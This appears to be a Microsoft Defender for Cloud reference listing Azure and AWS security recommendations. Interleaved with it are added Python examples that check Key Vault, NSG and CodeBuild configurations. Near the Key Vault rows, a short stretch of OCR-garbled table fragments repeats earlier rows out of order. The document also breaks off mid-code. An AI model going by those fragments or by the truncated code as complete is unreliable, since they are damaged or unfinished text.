Description: Accounts with read permissions that have been provisioned outside of the Azure Active Directory tenant (different domain names) should be removed from your Azure resources. Guest accounts are not managed to the same standards as enterprise tenant identities. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(No related policy)

Recommendation: Guest accounts with write permissions on Azure resources should be removed
Severity: High
Description: Accounts with write permissions that have been provisioned outside of the Azure Active Directory tenant (different domain names) should be removed from your Azure resources. Guest accounts are not managed to the same standards as enterprise tenant identities. These accounts can be targets for attackers looking to find ways to access your data without being noticed.
(No related policy)

Recommendation: Key Vault keys should have an expiration date
Severity: High
Description: Cryptographic keys should have a defined expiration date and not be permanent. Keys that are valid forever provide a potential attacker with more time to compromise the key. It is a recommended security practice to set expiration dates on cryptographic keys.
(Related policy: Key Vault keys should have an expiration date)

Recommendation: Key Vault secrets should have an expiration date
Severity: High
Description: Secrets should have a defined expiration date and not be permanent. Secrets that are valid forever provide a potential attacker with more time to compromise them. It is a recommended security practice to set expiration dates on secrets.
(Related policy: Key Vault secrets should have an expiration date)

Recommendation: Key vaults should have purge protection enabled
Severity: Medium
Description: Malicious deletion of a key vault can lead to permanent data loss. A malicious insider in your organization can potentially delete and purge key vaults. Purge protection protects you from insider attacks by enforcing a mandatory retention period for soft-deleted key vaults. No one inside your organization or Microsoft will be able to purge your key vaults during the soft-delete retention period.
(Related policy: Key vaults should have purge protection enabled)

Recommendation: Key vaults should have soft delete enabled
Severity: High
Description: Deleting a key vault without soft delete enabled permanently deletes all secrets, keys, and certificates stored in the key vault. Accidental deletion of a key vault can lead to permanent data loss. Soft delete allows you to recover an


accidentally deleted key vault for a configurable retention period.
(Related policy: Key vaults should have soft delete enabled)

Recommendation: MFA should be enabled on accounts with owner permissions on subscriptions
Severity: High
Description: Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with owner permissions to prevent a breach of accounts or resources.
(Related policy: MFA should be enabled on accounts with owner permissions on your subscription)

Recommendation: MFA should be enabled on accounts with read permissions on subscriptions
Severity: High
Description: Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with read privileges to prevent a breach of accounts or resources.
(Related policy: MFA should be enabled on accounts with read permissions on your subscription)

Recommendation: MFA should be enabled on accounts with write permissions on subscriptions
Severity: High
Description: Multi-Factor Authentication (MFA) should be enabled for all subscription accounts with write privileges to prevent a breach of accounts or resources.
(Related policy: MFA should be enabled on accounts with write permissions on your subscription)

Recommendation: Microsoft Defender for Key Vault should be enabled
Severity: High
Description: Microsoft Defender for Cloud includes Microsoft Defender for Key Vault, providing an additional layer of security intelligence. Microsoft Defender for Key Vault detects unusual and potentially harmful attempts to access or exploit Key Vault accounts.
Important: Protections from this plan are charged as shown on the Defender plans page. If you don't have any key vaults in this subscription, you won't be charged. If you later create key vaults on this subscription, they'll automatically be protected and charges will begin. Learn about the pricing details per region.
Learn more in Introduction to Microsoft Defender for Key Vault.
(Related policy: Azure Defender for Key Vault should be enabled)

Recommendation: Private endpoint should be configured for Key Vault
Severity: Medium
Description: Private link provides a way to connect Key Vault to your Azure resources without sending traffic over the public internet. Private link provides defense-in-depth protection against data exfiltration.
(Related policy: Private endpoint should be configured for Key Vault)

Recommendation: Storage account public access should be disallowed
Severity: Medium
Description: Anonymous public read access to containers and blobs in Azure Storage is a convenient way to share data, but might


Recommendation 


disallowed Z 


There should be more 
than one owner 
assigned to 
subscriptions Z 


Validity period of 
certificates stored in 
Azure Key Vault should 
not exceed 12 months € 


Description 


present security risks. To prevent data breaches caused by 
undesired anonymous access, Microsoft recommends 
preventing public access to a storage account unless your 
scenario requires it. 

(Related policy: Storage account public access should be 
disallowed £Z) 


Designate more than one subscription owner in order to 
have administrator access redundancy. 

(Related policy: There should be more than one owner 
assigned to your subscription Z ) 


Ensure your certificates do not have a validity period that 
exceeds 12 months. 

(Related policy: Certificates should have the specified 
maximum validity period £ ) 
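The Key Vault and storage rows above are all configuration checks, and the same checks are easy to run yourself against exported resource JSON before Defender for Cloud's next assessment cycle. The Python below is an added example, not Microsoft's or Defender for Cloud's code: it evaluates soft delete, purge protection, secret expiration and anonymous blob access over constructed dictionaries. The resource names and values are made up, and the property names (`properties.enableSoftDelete`, `properties.enablePurgeProtection`, `attributes.expires`, `properties.allowBlobPublicAccess`) are assumed from the shapes returned by `az keyvault show`, `az keyvault secret list` and `az storage account show`; adjust them if your export differs.

```python
"""Config-as-data checks for four of the Key Vault and storage recommendations.

Added example, not Microsoft's code. Inputs are constructed dicts whose property
names are assumed to follow the az CLI JSON output; severities are the table's.
"""
from dataclasses import dataclass

# Secure score treats High before Medium before Low; used to order the report.
SEVERITY_RANK = {"High": 0, "Medium": 1, "Low": 2}


@dataclass(frozen=True)
class Finding:
    resource: str
    recommendation: str
    severity: str


# Constructed sample: soft delete is on, purge protection was never enabled.
VAULT = {
    "name": "kv-payments-prod",
    "properties": {
        "enableSoftDelete": True,
        "enablePurgeProtection": None,   # null in the CLI output when never set (assumption)
        "softDeleteRetentionInDays": 90,
    },
}

# Constructed sample secrets: one enabled secret never expires.
SECRETS = [
    {"name": "db-conn-string", "attributes": {"enabled": True, "expires": None}},
    {"name": "api-key", "attributes": {"enabled": True, "expires": "2024-01-31T00:00:00+00:00"}},
    {"name": "legacy-token", "attributes": {"enabled": False, "expires": None}},
]

# Constructed sample storage account with anonymous blob access still allowed.
STORAGE = {"name": "stpaymentsprod", "properties": {"allowBlobPublicAccess": True}}


def check_vault(vault):
    """Soft delete and purge protection findings for one key vault."""
    props = vault.get("properties", {})
    out = []
    if props.get("enableSoftDelete") is not True:
        out.append(Finding(vault["name"], "Key vaults should have soft delete enabled", "High"))
    # Purge protection is write-once (it cannot be switched off later), so anything other
    # than an explicit True means the vault can still be purged inside the retention window.
    if props.get("enablePurgeProtection") is not True:
        out.append(Finding(vault["name"], "Key vaults should have purge protection enabled", "Medium"))
    return out


def check_secrets(vault_name, secrets):
    """Enabled secrets with no expiration date. Disabled secrets cannot be read, so they are skipped."""
    return [
        Finding(f"{vault_name}/{s['name']}", "Key Vault secrets should have an expiration date", "High")
        for s in secrets
        if s["attributes"].get("enabled", True) and not s["attributes"].get("expires")
    ]


def check_storage(account):
    """Only an explicit False passes; an unset value is treated as allowing public access."""
    props = account.get("properties", {})
    if props.get("allowBlobPublicAccess") is not False:
        return [Finding(account["name"], "Storage account public access should be disallowed", "Medium")]
    return []


def evaluate(vault, secrets, storage):
    """All findings, highest severity first, then by resource name."""
    found = check_vault(vault) + check_secrets(vault["name"], secrets) + check_storage(storage)
    return sorted(found, key=lambda f: (SEVERITY_RANK[f.severity], f.resource))


if __name__ == "__main__":
    for f in evaluate(VAULT, SECRETS, STORAGE):
        print(f"[{f.severity}] {f.resource}: {f.recommendation}")
```

Feeding the real CLI output in is a matter of `json.load` on each command's stdout; the point of the example is the two edge cases that trip people up: purge protection reported as null rather than false, and disabled secrets that should not be counted as non-expiring.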


IoT recommendations

There are 4 recommendations in this category.

Recommendation: Default IP Filter Policy should be Deny (Severity: Medium)
IP Filter Configuration should have rules defined for allowed traffic and should deny all other traffic by default.
(No related policy)

Recommendation: Diagnostic logs in IoT Hub should be enabled (Severity: Low)
Enable logs and retain them for up to a year. This enables you to recreate activity trails for investigation purposes when a security incident occurs or your network is compromised.
(Related policy: Diagnostic logs in IoT Hub should be enabled)

Recommendation: Identical Authentication Credentials (Severity: High)
Identical authentication credentials to the IoT Hub are used by multiple devices. This could indicate an illegitimate device impersonating a legitimate device. It also exposes the risk of device impersonation by an attacker.
(No related policy)

Recommendation: IP Filter rule large IP range (Severity: Medium)
An Allow IP Filter rule's source IP range is too large. Overly permissive rules might expose your IoT hub to malicious actors.
(No related policy)


Networking recommendations

There are 13 recommendations in this category.

Recommendation: Access to storage accounts with firewall and virtual network configurations should be restricted (Severity: Low)
Review the settings of network access in your storage account firewall settings. We recommend configuring network rules so that only applications from allowed networks can access the storage account. To allow connections from specific internet or on-premises clients, access can be granted to traffic from specific Azure virtual networks or to public internet IP address ranges.
(Related policy: Storage accounts should restrict network access)

Recommendation: Adaptive network hardening recommendations should be applied on internet facing virtual machines (Severity: High)
Defender for Cloud has analyzed the internet traffic communication patterns of the virtual machines listed below, and determined that the existing rules in the NSGs associated to them are overly permissive, resulting in an increased potential attack surface. A rule is typically flagged when the IP address it allows doesn't communicate regularly with the resource, or when that IP address has been flagged as malicious by Defender for Cloud's threat intelligence sources. Learn more in Improve your network security posture with adaptive network hardening.
(Related policy: Adaptive network hardening recommendations should be applied on internet facing virtual machines)

Recommendation: All network ports should be restricted on network security groups associated to your virtual machine (Severity: High)
Defender for Cloud has identified some of your network security groups' inbound rules to be too permissive. Inbound rules should not allow access from 'Any' or 'Internet' ranges. This can potentially enable attackers to target your resources.
(Related policy: All network ports should be restricted on network security groups associated to your virtual machine)

Recommendation: Azure DDoS Protection Standard should be enabled (Severity: Medium)
Defender for Cloud has discovered virtual networks with Application Gateway resources unprotected by the DDoS protection service. These resources contain public IPs. Enable mitigation of network volumetric and protocol attacks.
(Related policy: Azure DDoS Protection Standard should be enabled)

Recommendation: Internet-facing virtual machines should be protected with network security groups (Severity: High)
Protect your VM from potential threats by restricting access to it with a network security group (NSG). NSGs contain a list of Access Control List (ACL) rules that allow or deny network traffic to your VM from other instances, in or outside the same subnet. To keep your machine as secure as possible, the VM's access to the internet must be restricted and an NSG should be enabled on the subnet. VMs with 'High' severity are internet-facing VMs.
(Related policy: Internet-facing virtual machines should be protected with network security groups)

Recommendation: IP forwarding on your virtual machine should be disabled (Severity: Medium)
Defender for Cloud has discovered that IP forwarding is enabled on some of your virtual machines. Enabling IP forwarding on a virtual machine's NIC allows the machine to receive traffic addressed to other destinations. IP forwarding is rarely required (for example, when using the VM as a network virtual appliance), and therefore should be reviewed by the network security team.
(Related policy: IP Forwarding on your virtual machine should be disabled)

Recommendation: Machines should have ports closed that might expose attack vectors (Severity: High)
Azure's terms of use prohibit the use of Azure services in ways that could damage, disable, overburden, or impair any Microsoft server or the network. This recommendation lists exposed ports that need to be closed for your continued security. It also illustrates the potential threat to each port.
(No related policy)

Recommendation: Management ports of virtual machines should be protected with just-in-time network access control (Severity: High)
Defender for Cloud has identified some overly permissive inbound rules for management ports in your Network Security Group. Enable just-in-time access control to protect your VM from internet-based brute-force attacks. Learn more in Understanding just-in-time (JIT) VM access.
(Related policy: Management ports of virtual machines should be protected with just-in-time network access control)

Recommendation: Management ports should be closed on your virtual machines (Severity: Medium)
Open remote management ports expose your VM to a high level of risk from Internet-based attacks. These attacks attempt to brute-force credentials to gain admin access to the machine.
(Related policy: Management ports should be closed on your virtual machines)

Recommendation: Non-internet-facing virtual machines should be protected with network security groups (Severity: Low)
Protect your non-internet-facing virtual machine from potential threats by restricting access to it with a network security group (NSG). NSGs contain a list of Access Control List (ACL) rules that allow or deny network traffic to your VM from other instances, whether or not they're on the same subnet. Note that to keep your machine as secure as possible, the VM's access to the internet must be restricted and an NSG should be enabled on the subnet.
(Related policy: Non-internet-facing virtual machines should be protected with network security groups)

Recommendation: Secure transfer to storage accounts should be enabled (Severity: High)
Secure transfer is an option that forces your storage account to accept requests only from secure connections (HTTPS). Use of HTTPS ensures authentication between the server and the service and protects data in transit from network-layer attacks such as man-in-the-middle, eavesdropping, and session hijacking.
(Related policy: Secure transfer to storage accounts should be enabled)

Recommendation: Subnets should be associated with a network security group (Severity: Low)
Protect your subnet from potential threats by restricting access to it with a network security group (NSG). NSGs contain a list of Access Control List (ACL) rules that allow or deny network traffic to your subnet. When an NSG is associated with a subnet, the ACL rules apply to all the VM instances and integrated services in that subnet, but don't apply to internal traffic inside the subnet. To secure resources in the same subnet from one another, enable an NSG directly on the resources as well. Note that the following subnet types will be listed as not applicable: GatewaySubnet, AzureFirewallSubnet, AzureBastionSubnet.
(Related policy: Subnets should be associated with a Network Security Group)

Recommendation: Virtual networks should be protected by Azure Firewall (Severity: Low)
Some of your virtual networks aren't protected with a firewall. Use Azure Firewall to restrict access to your virtual networks and prevent potential threats. Learn more about Azure Firewall.
(Related policy: All Internet traffic should be routed via your deployed Azure Firewall)
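Three of the rows above (all network ports restricted, management ports closed, and the just-in-time recommendation) come down to one question: after NSG priorities are applied, which ports does the group actually leave open to 'Any' or 'Internet'? The Python below is an added example, not Defender for Cloud's assessment engine, and it shows the part that is easy to get wrong by eye: a Deny at a lower priority number shadows a later Allow, while a rule whose source is a single CIDR neither opens nor closes a port to the internet at large. The rule list is constructed and follows the shape of the flattened `az network nsg rule list` output; the management-port list and the set of "internet-wide" source prefixes are assumptions.

```python
"""Effective internet exposure of an NSG's inbound rules.

Added example (not Defender for Cloud's engine). SAMPLE_RULES is constructed;
MANAGEMENT_PORTS and INTERNET_SOURCES are assumptions, not Azure definitions.
"""

# Ports the management-port recommendations talk about (WinRM added as an assumption).
MANAGEMENT_PORTS = {22: "SSH", 3389: "RDP", 5985: "WinRM", 5986: "WinRM over HTTPS"}

# Sources that mean "anyone on the internet": the '*' wildcard, the Internet service tag,
# and the explicit default-route CIDRs. Compared case-insensitively.
INTERNET_SOURCES = {"*", "any", "internet", "0.0.0.0/0", "::/0"}

SAMPLE_RULES = [
    # A lower priority number wins: this deny shadows the RDP allow at 300.
    {"name": "deny-rdp-internet", "priority": 100, "direction": "Inbound", "access": "Deny",
     "protocol": "Tcp", "sourceAddressPrefix": "*", "destinationPortRange": "3389"},
    {"name": "allow-rdp-internet", "priority": 300, "direction": "Inbound", "access": "Allow",
     "protocol": "Tcp", "sourceAddressPrefix": "Internet", "destinationPortRange": "3389"},
    {"name": "allow-ssh-anywhere", "priority": 310, "direction": "Inbound", "access": "Allow",
     "protocol": "Tcp", "sourceAddressPrefix": "0.0.0.0/0", "destinationPortRange": "22"},
    # Narrow source: not internet-wide, so it neither exposes nor protects anything here.
    {"name": "allow-winrm-bastion", "priority": 320, "direction": "Inbound", "access": "Allow",
     "protocol": "Tcp", "sourceAddressPrefix": "10.1.2.0/24", "destinationPortRange": "5985"},
    {"name": "allow-web", "priority": 400, "direction": "Inbound", "access": "Allow",
     "protocol": "Tcp", "sourceAddressPrefix": "*", "destinationPortRanges": ["80", "443"]},
]


def port_ranges(rule):
    """Yield (lo, hi) pairs for the rule's destination ports; '*' means every port."""
    raw = rule.get("destinationPortRanges") or [rule.get("destinationPortRange", "*")]
    for item in raw:
        if item == "*":
            yield 0, 65535
        elif "-" in item:
            lo, hi = item.split("-", 1)
            yield int(lo), int(hi)
        else:
            yield int(item), int(item)


def from_internet(rule):
    sources = rule.get("sourceAddressPrefixes") or [rule.get("sourceAddressPrefix", "")]
    return any(s.lower() in INTERNET_SOURCES for s in sources)


def internet_reachable(rules, port, protocol="Tcp"):
    """First matching internet-wide rule wins, in priority order, like the NSG data plane.

    Rules with a narrower source are skipped on purpose: a deny from one CIDR does not
    close the port to the rest of the internet, and an allow from one CIDR does not open
    it to 'Any'. No match falls through to the built-in DenyAllInbound rule.
    """
    for rule in sorted(rules, key=lambda r: r["priority"]):
        if rule.get("direction") != "Inbound" or not from_internet(rule):
            continue
        if rule.get("protocol", "*") not in ("*", protocol):
            continue
        if not any(lo <= port <= hi for lo, hi in port_ranges(rule)):
            continue
        return rule["access"] == "Allow"
    return False


def exposed_ports(rules, protocol="Tcp"):
    return [p for p in range(65536) if internet_reachable(rules, p, protocol)]


def compress(ports):
    """Collapse a sorted port list into 'lo-hi' / 'p' strings for reporting."""
    out, start, prev = [], None, None
    for p in ports:
        if start is None:
            start = prev = p
        elif p == prev + 1:
            prev = p
        else:
            out.append(f"{start}-{prev}" if start != prev else str(start))
            start = prev = p
    if start is not None:
        out.append(f"{start}-{prev}" if start != prev else str(start))
    return out


def findings(rules):
    """(severity, recommendation, detail) tuples using the severities from the table."""
    ports = exposed_ports(rules)
    out = []
    if ports:
        out.append(("High", "All network ports should be restricted on network security groups "
                            "associated to your virtual machine",
                    "open from Any/Internet: " + ", ".join(compress(ports))))
    mgmt = [f"{MANAGEMENT_PORTS[p]} ({p})" for p in ports if p in MANAGEMENT_PORTS]
    if mgmt:
        out.append(("Medium", "Management ports should be closed on your virtual machines", ", ".join(mgmt)))
    return out


if __name__ == "__main__":
    for severity, recommendation, detail in findings(SAMPLE_RULES):
        print(f"[{severity}] {recommendation}: {detail}")
```

Run against the sample, RDP is reported closed even though an Allow rule for it exists, SSH and the web ports are reported open, and the bastion-only WinRM rule is ignored. Subnet-level NSGs and the VM's own NIC-level NSG are evaluated independently in Azure; to get the real exposure, run both through the same function and intersect the results.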


API recommendations

Recommendation: (Preview) Microsoft Defender for APIs should be enabled (Severity: High)
Enable the Defender for APIs plan to discover and protect API resources against attacks and security misconfigurations. Learn more.

Recommendation: (Preview) Azure API Management APIs should be onboarded to Defender for APIs (Severity: High)
Onboarding APIs to Defender for APIs requires compute and memory utilization on the Azure API Management service. Monitor performance of your Azure API Management service while onboarding APIs, and scale out your Azure API Management resources as needed.

Recommendation: (Preview) API endpoints that are unused should be disabled and removed from the Azure API Management service (Severity: Low)
As a security best practice, API endpoints that haven't received traffic for 30 days are considered unused, and should be removed from the Azure API Management service. Keeping unused API endpoints might pose a security risk. These might be APIs that should have been deprecated from the Azure API Management service, but have accidentally been left active. Such APIs typically do not receive the most up-to-date security coverage.

Recommendation: (Preview) API endpoints in Azure API Management should be authenticated (Severity: High)
API endpoints published within Azure API Management should enforce authentication to help minimize security risk. Authentication mechanisms are sometimes implemented incorrectly or are missing. This allows attackers to exploit implementation flaws and to access data. For APIs published in Azure API Management, this recommendation assesses the execution of authentication via the Subscription Keys, JWT, and Client Certificate configured within Azure API Management. If none of these authentication mechanisms are executed during the API call, the API will receive this recommendation.
API management recommendations

Recommendation: (Preview) API Management subscriptions should not be scoped to all APIs (Severity: Medium)
API Management subscriptions should be scoped to a product or an individual API instead of all APIs, which could result in excessive data exposure.

Recommendation: (Preview) API Management calls to API backends should not bypass certificate thumbprint or name validation (Severity: Medium)
API Management should validate the backend server certificate for all API calls. Enable SSL certificate thumbprint and name validation to improve the API security.

Recommendation: (Preview) API Management direct management endpoint should not be enabled (Severity: Low)
The direct management REST API in Azure API Management bypasses Azure Resource Manager role-based access control, authorization, and throttling mechanisms, thus increasing the vulnerability of your service.

Recommendation: (Preview) API Management APIs should use only encrypted protocols (Severity: High)
APIs should be available only through encrypted protocols, like HTTPS or WSS. Avoid using unsecured protocols, such as HTTP or WS, to ensure security of data in transit.

Recommendation: (Preview) API Management secret named values should be stored in Azure Key Vault (Severity: Medium)
Named values are a collection of name and value pairs in each API Management service. Secret values can be stored either as encrypted text in API Management (custom secrets) or by referencing secrets in Azure Key Vault. Reference secret named values from Azure Key Vault to improve security of API Management and secrets. Azure Key Vault supports granular access management and secret rotation policies.

Recommendation: (Preview) API Management should disable public network access to the service configuration endpoints (Severity: Medium)
To improve the security of API Management services, restrict connectivity to service configuration endpoints, like the direct access management API, the Git configuration management endpoint, or the self-hosted gateways configuration endpoint.

Recommendation: (Preview) API Management minimum API version should be set to 2019-12-01 or higher (Severity: Medium)
To prevent service secrets from being shared with read-only users, the minimum API version should be set to 2019-12-01 or higher.

Recommendation: (Preview) API Management calls to API backends should be authenticated (Severity: Medium)
Calls from API Management to backends should use some form of authentication, whether via certificates or credentials. Does not apply to Service Fabric backends.


AI recommendations

Recommendation: Resource logs in Azure Machine Learning Workspaces should be enabled (Preview) (Severity: Medium)
Resource logs enable recreating activity trails to use for investigation purposes when a security incident occurs or when your network is compromised.

Recommendation: Azure Machine Learning Workspaces should disable public network access (Preview) (Severity: Medium)
Disabling public network access improves security by ensuring that the Machine Learning Workspaces aren't exposed on the public internet. You can control exposure of your workspaces by creating private endpoints instead. For more information, see Configure a private endpoint for an Azure Machine Learning workspace.

Recommendation: Azure Machine Learning Computes should be in a virtual network (Preview) (Severity: Medium)
Azure Virtual Networks provide enhanced security and isolation for your Azure Machine Learning Compute Clusters and Instances, as well as subnets, access control policies, and other features to further restrict access. When a compute is configured with a virtual network, it is not publicly addressable and can only be accessed from virtual machines and applications within the virtual network.

Recommendation: Azure Machine Learning Computes should have local authentication methods disabled (Preview) (Severity: Medium)
Disabling local authentication methods improves security by ensuring that Machine Learning Computes require Azure Active Directory identities exclusively for authentication. For more information, see Azure Policy Regulatory Compliance controls for Azure Machine Learning.

Recommendation: Azure Machine Learning compute instances should be recreated to get the latest software updates (Preview) (Severity: Medium)
Ensure Azure Machine Learning compute instances run on the latest available operating system. Security is improved and vulnerabilities reduced by running with the latest security patches. For more information, see Vulnerability management for Azure Machine Learning.

Recommendation: Resource logs in Azure Databricks Workspaces should be enabled (Preview) (Severity: Medium)
Resource logs enable recreating activity trails to use for investigation purposes when a security incident occurs or when your network is compromised.

Recommendation: Azure Databricks Workspaces should disable public network access (Preview) (Severity: Medium)
Disabling public network access improves security by ensuring that the resource isn't exposed on the public internet. You can control exposure of your resources by creating private endpoints instead. For more information, see Enable Azure Private Link.

Recommendation: Azure Databricks Clusters should disable public IP (Preview) (Severity: Medium)
Disabling public IP of clusters in Azure Databricks Workspaces improves security by ensuring that the clusters aren't exposed on the public internet. For more information, see Secure cluster connectivity.

Recommendation: Azure Databricks Workspaces should be in a virtual network (Preview) (Severity: Medium)
Azure Virtual Networks provide enhanced security and isolation for your Azure Databricks Workspaces, as well as subnets, access control policies, and other features to further restrict access. For more information, see Deploy Azure Databricks in your Azure virtual network.

Recommendation: Azure Databricks Workspaces should use private link (Preview) (Severity: Medium)
Azure Private Link lets you connect your virtual networks to Azure services without a public IP address at the source or destination. The Private Link platform handles the connectivity between the consumer and services over the Azure backbone network. By mapping private endpoints to Azure Databricks workspaces, you can reduce data leakage risks. For more information, see Create the workspace and private endpoints in the Azure portal UI.


Deprecated recommendations

Recommendation: Access to App Services should be restricted (Severity: High)
Restrict access to your App Services by changing the networking configuration, to deny inbound traffic from ranges that are too broad.
(Related policy: [Preview]: Access to App Services should be restricted)

Recommendation: The rules for web applications on IaaS NSGs should be hardened (Severity: High)
Harden the network security group (NSG) of your virtual machines that are running web applications, with NSG rules that are overly permissive with regard to web application ports.
(Related policy: The NSGs rules for web applications on IaaS should be hardened)

Recommendation: Pod Security Policies should be defined to reduce the attack vector by removing unnecessary application privileges (Preview) (Severity: Medium)
Define Pod Security Policies to reduce the attack vector by removing unnecessary application privileges. It is recommended to configure pod security policies so pods can only access resources which they are allowed to access.
(Related policy: [Preview]: Pod Security Policies should be defined on Kubernetes Services)

Recommendation: Install Azure Security Center for IoT security module to get more visibility into your IoT devices (Severity: Low)
Install the Azure Security Center for IoT security module to get more visibility into your IoT devices.

Recommendation: Your machines should be restarted to apply system updates (Severity: Medium)
Restart your machines to apply the system updates and secure the machine from vulnerabilities.
(Related policy: System updates should be installed on your machines)

Recommendation: Monitoring agent should be installed on your machines (Severity: High)
This action installs a monitoring agent on the selected virtual machines. Select a workspace for the agent to report to.
(No related policy)

Recommendation: Java should be updated to the latest version for web apps (Severity: Medium)
Periodically, newer versions are released for Java software either due to security flaws or to include additional functionality. Using the latest Java version for web apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version.
(Related policy: Ensure that 'Java version' is the latest, if used as a part of the Web app)

Recommendation: Python should be updated to the latest version for function apps (Severity: Medium)
Periodically, newer versions are released for Python software either due to security flaws or to include additional functionality. Using the latest Python version for function apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version.
(Related policy: Ensure that 'Python version' is the latest, if used as a part of the Function app)

Recommendation: Python should be updated to the latest version for web apps (Severity: Medium)
Periodically, newer versions are released for Python software either due to security flaws or to include additional functionality. Using the latest Python version for web apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version.
(Related policy: Ensure that 'Python version' is the latest, if used as a part of the Web app)

Recommendation: Java should be updated to the latest version for function apps (Severity: Medium)
Periodically, newer versions are released for Java software either due to security flaws or to include additional functionality. Using the latest Java version for function apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version.
(Related policy: Ensure that 'Java version' is the latest, if used as a part of the Function app)

Recommendation: PHP should be updated to the latest version for web apps (Severity: Medium)
Periodically, newer versions are released for PHP software either due to security flaws or to include additional functionality. Using the latest PHP version for web apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version.
(Related policy: Ensure that 'PHP version' is the latest, if used as a part of the WEB app)


Next steps

To learn more about recommendations, see the following:

* What are security policies, initiatives, and recommendations?
* Review your security recommendations


Security recommendations for AWS resources - a reference guide

Article 06/27/2023

This article lists the recommendations you might see in Microsoft Defender for Cloud if you've connected an AWS account from the Environment settings page. The recommendations shown in your environment depend on the resources you're protecting and your customized configuration.

To learn about how to respond to these recommendations, see Remediate recommendations in Defender for Cloud.

Your secure score is based on the number of security recommendations you've completed. To decide which recommendations to resolve first, look at the severity of each one and its potential impact on your secure score.


AWS Compute recommendations

There are 18 AWS recommendations in this category.

Recommendation: Amazon EC2 instances managed by Systems Manager should have a patch compliance status of COMPLIANT after a patch installation (Severity: Medium)
This control checks whether the compliance status of the Amazon EC2 Systems Manager patch compliance is COMPLIANT or NON_COMPLIANT after the patch installation on the instance. It only checks instances that are managed by AWS Systems Manager Patch Manager. It does not check whether the patch was applied within the 30-day limit prescribed by PCI DSS requirement '6.2'. It also does not validate whether the patches applied were classified as security patches. You should create patching groups with the appropriate baseline settings and ensure in-scope systems are managed by those patch groups in Systems Manager. For more information about patch groups, see the AWS Systems Manager User Guide.

Recommendation: Amazon EFS should be configured to encrypt file data at rest using AWS KMS (Severity: Medium)
This control checks whether Amazon Elastic File System is configured to encrypt the file data using AWS KMS. The check fails in the following cases:
* "Encrypted" is set to "false" in the DescribeFileSystems response.
* The "KmsKeyId" key in the DescribeFileSystems response does not match the KmsKeyId parameter for efs-encrypted-check.
Note that this control does not use the "KmsKeyId" parameter for efs-encrypted-check. It only checks the value of "Encrypted". For an added layer of security for your sensitive data in Amazon EFS, you should create encrypted file systems. Amazon EFS supports encryption for file systems at rest. You can enable encryption of data at rest when you create an Amazon EFS file system. To learn more about Amazon EFS encryption, see Data encryption in Amazon EFS in the Amazon Elastic File System User Guide.

Recommendation: Amazon EFS volumes should be in backup plans (Severity: Medium)
This control checks whether Amazon Elastic File System (Amazon EFS) file systems are added to the backup plans in AWS Backup. The control fails if Amazon EFS file systems are not included in the backup plans. Including EFS file systems in the backup plans helps you to protect your data from deletion and data loss.

Recommendation: Application Load Balancer deletion protection should be enabled (Severity: Medium)
This control checks whether an Application Load Balancer has deletion protection enabled. The control fails if deletion protection is not configured. Enable deletion protection to protect your Application Load Balancer from deletion.

Recommendation: Auto Scaling groups associated with a load balancer should use health checks (Severity: Low)
Auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. PCI DSS does not require load balancing or highly available configurations. This is recommended by AWS best practices.

Recommendation: AWS accounts should have Azure Arc auto provisioning enabled (Severity: High)
For full visibility of the security content from Microsoft Defender for Servers, EC2 instances should be connected to Azure Arc. To ensure that all eligible EC2 instances automatically receive Azure Arc, enable auto-provisioning from Defender for Cloud at the AWS account level. Learn more about Azure Arc, and Microsoft Defender for Servers.

Recommendation: CloudFront distributions should have origin failover configured (Severity: Medium)
This control checks whether an Amazon CloudFront distribution is configured with an origin group that has two or more origins. CloudFront origin failover can increase availability. Origin failover automatically redirects traffic to a secondary origin if the primary origin is unavailable or if it returns specific HTTP response status codes.

Recommendation: CodeBuild GitHub or Bitbucket source repository URLs should use OAuth (Severity: High)
This control checks whether the GitHub or Bitbucket source repository URL contains either personal access tokens or a user name and password. Authentication credentials should never be stored or transmitted in clear text or appear in the repository URL. Instead of personal access tokens or user name and password, you should use OAuth to grant authorization for accessing GitHub or Bitbucket repositories. Using personal access tokens or a user name and password could expose your credentials to unintended data exposure and unauthorized access.

Recommendation: CodeBuild project environment variables should not contain credentials (Severity: High)
This control checks whether the project contains the environment variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY. Authentication credentials AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY should never be stored in clear text, as this could lead to unintended data exposure and unauthorized access.

Recommendation: DynamoDB Accelerator (DAX) clusters should be encrypted at rest (Severity: Medium)
This control checks whether a DAX cluster is encrypted at rest. Encrypting data at rest reduces the risk of data stored on disk being accessed by a user not authenticated to AWS. The encryption adds another set of access controls to limit the ability of unauthorized users to access the data. For example, API permissions are required to decrypt the data before it can be read.

Recommendation: DynamoDB tables should automatically scale capacity with demand (Severity: Medium)
This control checks whether an Amazon DynamoDB table can scale its read and write capacity as needed. This control passes if the table uses either on-demand capacity mode or provisioned mode with auto scaling configured. Scaling capacity with demand avoids throttling exceptions, which helps to maintain availability of your applications.

Recommendation: EC2 instances should be connected to Azure Arc (Severity: High)
Connect your EC2 instances to Azure Arc in order to have full visibility into Microsoft Defender for Servers security content. Learn more about Azure Arc, and about Microsoft Defender for Servers in hybrid-cloud environments.
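The two CodeBuild rows above describe exactly what a local pre-deployment check should look for: AWS keys stored as PLAINTEXT environment variables, and a token or user:password pair smuggled into the clone URL. The Python below is an added example, not AWS Security Hub's or Defender for Cloud's code. PROJECT is a constructed dict shaped like one element of `codebuild.batch_get_projects()["projects"]` from boto3; the key IDs are the placeholder values AWS uses in its own documentation, the token is made up, and the AKIA prefix check and the set of repository types are assumptions.

```python
"""Credential hygiene checks for a CodeBuild project definition.

Added example, not AWS's or Microsoft's code. PROJECT is constructed; a live run
would pass a project dict from boto3's batch_get_projects() response instead.
"""
import re
from urllib.parse import urlsplit

# Variable names that carry AWS credentials; the recommendation names the first two.
CREDENTIAL_VARS = {"AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN"}

# Long-term access key IDs start with AKIA (assumption used to catch keys under other names).
ACCESS_KEY_ID_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

# Repository types the OAuth recommendation applies to (assumption).
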